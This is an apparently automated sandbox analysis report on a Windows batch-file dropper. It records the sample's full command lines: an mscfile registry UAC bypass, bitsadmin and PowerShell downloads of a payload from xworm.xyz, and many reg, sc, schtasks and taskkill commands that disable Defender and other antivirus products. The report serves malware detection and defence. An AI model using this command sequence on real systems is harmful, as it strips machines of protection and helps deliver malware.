Malware Analysis Report

2024-10-16 05:00

Sample ID 240729-z2nz7a1apm
Target Uac Bypass Windows Defender Disabler.bat
SHA256 acdf188d1f3e0d039a2e1b375566acdf640196cbb42ead21be755f9c438e041e
Tags dropper evasion execution trojan
Score 10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score 10/10

SHA256 acdf188d1f3e0d039a2e1b375566acdf640196cbb42ead21be755f9c438e041e

Threat Level: Known bad

The file Uac Bypass Windows Defender Disabler.bat was found to be: Known bad.

Malicious Activity Summary

dropper evasion execution trojan

Disables service(s)

Modifies Windows Defender Real-time Protection settings

Windows security bypass

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Stops running service(s)

Download via BitsAdmin

Launches sc.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Kills process with taskkill

Modifies registry key

Suspicious use of WriteProcessMemory

Uses Task Scheduler COM API

Suspicious use of AdjustPrivilegeToken

Modifies registry class

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-07-29 21:12

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-29 21:12

Reported

2024-07-29 21:15

Platform

win10-20240404-en

Max time kernel

133s

Max time network

138s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uac Bypass Windows Defender Disabler.bat"

Signatures

Disables service(s)

evasion execution

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description | Indicator | Process | Target
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Windows\system32\reg.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Windows\system32\reg.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Windows\system32\reg.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Windows\system32\reg.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Windows\system32\reg.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Windows\system32\reg.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A

Windows security bypass

evasion trojan
Description | Indicator | Process | Target
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\system32\reg.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\system32\reg.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\system32\reg.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\system32\reg.exe | N/A

Blocklisted process makes network request

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Command and Scripting Interpreter: PowerShell

execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Download via BitsAdmin

dropper
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\bitsadmin.exe | N/A

Stops running service(s)

evasion execution

Modifies registry class

Description | Indicator | Process | Target
Set value (str) | \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\mscfile\shell\open\command\ = "cmd.exe /c reg delete HKCU\\Software\\Classes\\mscfile\\shell\\open\\command /f & C:\\Windows\\System32\\cmd.exe" | C:\Windows\system32\reg.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\mscfile\shell\open\command | C:\Windows\system32\reg.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\mscfile | C:\Windows\system32\reg.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\mscfile\shell | C:\Windows\system32\reg.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\mscfile\shell\open | C:\Windows\system32\reg.exe | N/A

Modifies registry key

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\reg.exe | N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 1284 wrote to memory of 1112 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\net.exe
PID 1284 wrote to memory of 1112 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\net.exe
PID 1112 wrote to memory of 1884 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 1112 wrote to memory of 1884 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 1284 wrote to memory of 4148 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 1284 wrote to memory of 4148 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 1284 wrote to memory of 800 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\bitsadmin.exe
PID 1284 wrote to memory of 800 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\bitsadmin.exe
PID 1284 wrote to memory of 4004 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1284 wrote to memory of 4004 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1284 wrote to memory of 1476 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe
PID 1284 wrote to memory of 1476 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe
PID 1476 wrote to memory of 2876 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\sc.exe
PID 1476 wrote to memory of 2876 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\sc.exe
PID 1476 wrote to memory of 64 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\sc.exe
PID 1476 wrote to memory of 64 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\sc.exe
PID 1476 wrote to memory of 2060 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\schtasks.exe
PID 1476 wrote to memory of 2060 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\schtasks.exe
PID 1476 wrote to memory of 2496 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\schtasks.exe
PID 1476 wrote to memory of 2496 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\schtasks.exe
PID 1476 wrote to memory of 2212 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\schtasks.exe
PID 1476 wrote to memory of 2212 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\schtasks.exe
PID 1476 wrote to memory of 4176 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 1476 wrote to memory of 4176 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 1476 wrote to memory of 5004 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 1476 wrote to memory of 5004 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 1476 wrote to memory of 4572 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 1476 wrote to memory of 4572 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 1476 wrote to memory of 2880 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 1476 wrote to memory of 2880 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 1476 wrote to memory of 3984 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 1476 wrote to memory of 3984 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 1476 wrote to memory of 1460 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 1476 wrote to memory of 1460 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 1476 wrote to memory of 1380 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 1476 wrote to memory of 1380 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 1476 wrote to memory of 3336 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 1476 wrote to memory of 3336 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 1476 wrote to memory of 4196 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 1476 wrote to memory of 4196 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 1476 wrote to memory of 364 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 1476 wrote to memory of 364 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 1476 wrote to memory of 2540 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 1476 wrote to memory of 2540 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 1476 wrote to memory of 1564 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 1476 wrote to memory of 1564 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 1476 wrote to memory of 1008 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\schtasks.exe
PID 1476 wrote to memory of 1008 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\schtasks.exe
PID 1476 wrote to memory of 2096 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 1476 wrote to memory of 2096 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 1476 wrote to memory of 4464 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 1476 wrote to memory of 4464 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 1476 wrote to memory of 4984 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 1476 wrote to memory of 4984 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 1476 wrote to memory of 5080 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 1476 wrote to memory of 5080 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 1476 wrote to memory of 2360 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 1476 wrote to memory of 2360 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 1476 wrote to memory of 3036 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 1476 wrote to memory of 3036 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 1476 wrote to memory of 772 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 1476 wrote to memory of 772 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 1476 wrote to memory of 1804 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 1476 wrote to memory of 1804 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uac Bypass Windows Defender Disabler.bat"

C:\Windows\system32\net.exe

net session

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 session

C:\Windows\system32\reg.exe

reg add HKCU\Software\Classes\mscfile\shell\open\command /ve /d "cmd.exe /c reg delete HKCU\Software\Classes\mscfile\shell\open\command /f & C:\Windows\System32\cmd.exe" /f

C:\Windows\system32\bitsadmin.exe

bitsadmin /transfer mydownloadjob /download /priority normal https://xworm.xyz/stuff/$sxr-defender.bat C:\Users\Admin\AppData\Local\Temp\$sxr-defender.bat

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri 'https://xworm.xyz/stuff/$sxr-defender.bat' -OutFile 'C:\Users\Admin\AppData\Local\Temp\$sxr-defender.bat'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\$sxr-defender.bat"

C:\Windows\system32\sc.exe

sc stop WinDefend

C:\Windows\system32\sc.exe

sc config WinDefend start= disabled

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Public" /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\AppData\Roaming" /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\AppData\Local\Temp" /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin" /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableScheduledScan" /t REG_DWORD /d "1" /f

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableRoutinelyTakingAction" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t REG_DWORD /d "0" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableTamperProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "New-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows Defender\Features' -Name 'TamperProtection' -Value 0 -PropertyType DWORD -Force"

C:\Windows\system32\sc.exe

sc stop mfevtp

C:\Windows\system32\sc.exe

sc config mfevtp start= disabled

C:\Windows\system32\sc.exe

sc stop mfefire

C:\Windows\system32\sc.exe

sc config mfefire start= disabled

C:\Windows\system32\sc.exe

sc stop mfehidk

C:\Windows\system32\sc.exe

sc config mfehidk start= disabled

C:\Windows\system32\sc.exe

sc stop mfeapfk

C:\Windows\system32\sc.exe

sc config mfeapfk start= disabled

C:\Windows\system32\sc.exe

sc stop mfeavfk

C:\Windows\system32\sc.exe

sc config mfeavfk start= disabled

C:\Windows\system32\sc.exe

sc stop mfefirek

C:\Windows\system32\sc.exe

sc config mfefirek start= disabled

C:\Windows\system32\sc.exe

sc stop avastsvc

C:\Windows\system32\sc.exe

sc config avastsvc start= disabled

C:\Windows\system32\sc.exe

sc stop avastui

C:\Windows\system32\sc.exe

sc config avastui start= disabled

C:\Windows\system32\sc.exe

sc stop nissrv

C:\Windows\system32\sc.exe

sc config nissrv start= disabled

C:\Windows\system32\sc.exe

sc stop Symantec AntiVirus

C:\Windows\system32\sc.exe

sc config "Symantec AntiVirus" start= disabled

C:\Windows\system32\sc.exe

sc stop ccSvcHst

C:\Windows\system32\sc.exe

sc config ccSvcHst start= disabled

C:\Windows\system32\sc.exe

sc stop NortonSecurity

C:\Windows\system32\sc.exe

sc config NortonSecurity start= disabled

C:\Windows\system32\sc.exe

sc stop Norton AntiVirus

C:\Windows\system32\sc.exe

sc config "Norton AntiVirus" start= disabled

C:\Windows\system32\taskkill.exe

taskkill /F /IM Mcafee

C:\Windows\system32\taskkill.exe

taskkill /F /IM mcafee

C:\Windows\system32\taskkill.exe

taskkill /F /IM Mcafee.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM mcafee.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM McUICnt.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM McPltCmd.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM mcuihost.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM McInstru.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM avastui.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM ccSvcHst.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM mfefirek.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM mfehidk.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM avastsvc.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM McUICnt.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM McPltCmd.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM ModuleCoreService.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM ZhuDongFangYu.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM 360Safe.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM 360Tray.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM ns.exe

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | xworm.xyz | udp
US | 198.54.114.193:443 | xworm.xyz | tcp
US | 8.8.8.8:53 | 193.114.54.198.in-addr.arpa | udp
US | 198.54.114.193:443 | xworm.xyz | tcp
US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp
US | 8.8.8.8:53 | 91.65.42.20.in-addr.arpa | udp

Files

memory/4004-4-0x00007FFC29E13000-0x00007FFC29E14000-memory.dmp

memory/4004-5-0x0000016B271C0000-0x0000016B271E2000-memory.dmp

memory/4004-7-0x00007FFC29E10000-0x00007FFC2A7FC000-memory.dmp

memory/4004-9-0x00007FFC29E10000-0x00007FFC2A7FC000-memory.dmp

memory/4004-10-0x0000016B27370000-0x0000016B273E6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hvsc3lbd.kxi.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4004-25-0x00007FFC29E10000-0x00007FFC2A7FC000-memory.dmp

memory/4004-31-0x00007FFC29E10000-0x00007FFC2A7FC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\$sxr-defender.bat

MD5 03bf8860dbd0724e466baf1e1bca86b3
SHA1 bde4d3ef9ac846e1e83bea37f88097cd370d5197
SHA256 968dc5ab087e7a593d9b2682c2f6ee8aa6fd756ae874328a12d892d2b68fd0af
SHA512 0f3f5492be21a3af8262363f3d593aa63080f2d2db574451d8b94d4f00c3c3f06cb17c5795e6cccef84e9ebe684062a51829139177f7539f6629373e56e2e92f

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 42d4b1d78e6e092af15c7aef34e5cf45
SHA1 6cf9d0e674430680f67260194d3185667a2bb77b
SHA256 c4089b4313f7b8b74956faa2c4e15b9ffb1d9e5e29ac7e00a20c48b8f7aef5e0
SHA512 d31f065208766eea61facc91b23babb4c94906fb564dc06d114cbbc4068516f94032c764c188bed492509010c5dbe61f096d3e986e0ae3e70a170a9986458930

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 8a15e30f9c44a503e3666936a851b0f7
SHA1 65edb50e8fd7cd7077749165c8544b08ae094e5e
SHA256 1ff7c93f3aba06119b7b8663dc8fd00780d965cdde5afae68ea6603601771441
SHA512 539a2043e27f058c81370a5d1b35f2c18af866c6416751c0d77aa3439392c8b254096055da83b1719ae066d8ded6a8c7d974a5fe5cd7873d664a6613de3907ec

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 c6ab1c560795981f7ae9739268cfe22e
SHA1 289d5ae79442bba5353821f7bdbb4075f52b8013
SHA256 cfe7887979a8fbb050bc46de23567bd2b757784a389faa4cee691e5ba8ea9a20
SHA512 717ee3dad2daa8ec4fa9d55d25c377637858194af3562b291e9672a767edd7b7faecb9a54e27eef9ed5b2a7072e873718daa538c33e761f565a5c5c7e84da988

Analysis: behavioral2

Detonation Overview

Submitted

2024-07-29 21:12

Reported

2024-07-29 21:15

Platform

win11-20240709-en

Max time kernel

147s

Max time network

153s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uac Bypass Windows Defender Disabler.bat"

Signatures

Disables service(s)

evasion execution

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description | Indicator | Process | Target
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Windows\system32\reg.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Windows\system32\reg.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Windows\system32\reg.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Windows\system32\reg.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Windows\system32\reg.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Windows\system32\reg.exe | N/A

